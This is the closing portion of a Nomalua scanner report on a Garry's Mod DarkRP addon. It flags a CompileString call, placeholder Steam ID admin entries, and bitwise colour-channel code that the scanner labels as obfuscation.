206 2 - DYNCODE (Dynamic code execution) gamemodes/darkrp/gamemode/libraries/simplerr.lua:461 local err = CompileString(contents, path, false)
207 2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/config/config.lua:300 ["STEAM_0:0:00000000"] = "superadmin",
208 2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/config/config.lua:301 ["STEAM_0:0:11111111"] = "admin",
209 3 - OBFUSC (Obfuscated / encrypted code) lua/entities/gmod_sw_base.lua:137 local r = bit.rshift(bit.band(col32, 0xFF000000), 24)
210 3 - OBFUSC (Obfuscated / encrypted code) lua/entities/gmod_sw_base.lua:138 local g = bit.rshift(bit.band(col32, 0x00FF0000), 16)
211 3 - OBFUSC (Obfuscated / encrypted code) lua/entities/gmod_sw_base.lua:139 local b = bit.rshift(bit.band(col32, 0x0000FF00), 8)
212 3 - OBFUSC (Obfuscated / encrypted code) lua/entities/gmod_sw_base.lua:140 local a = bit.band(col32, 0x000000FF)
[Nomalua] Output complete!
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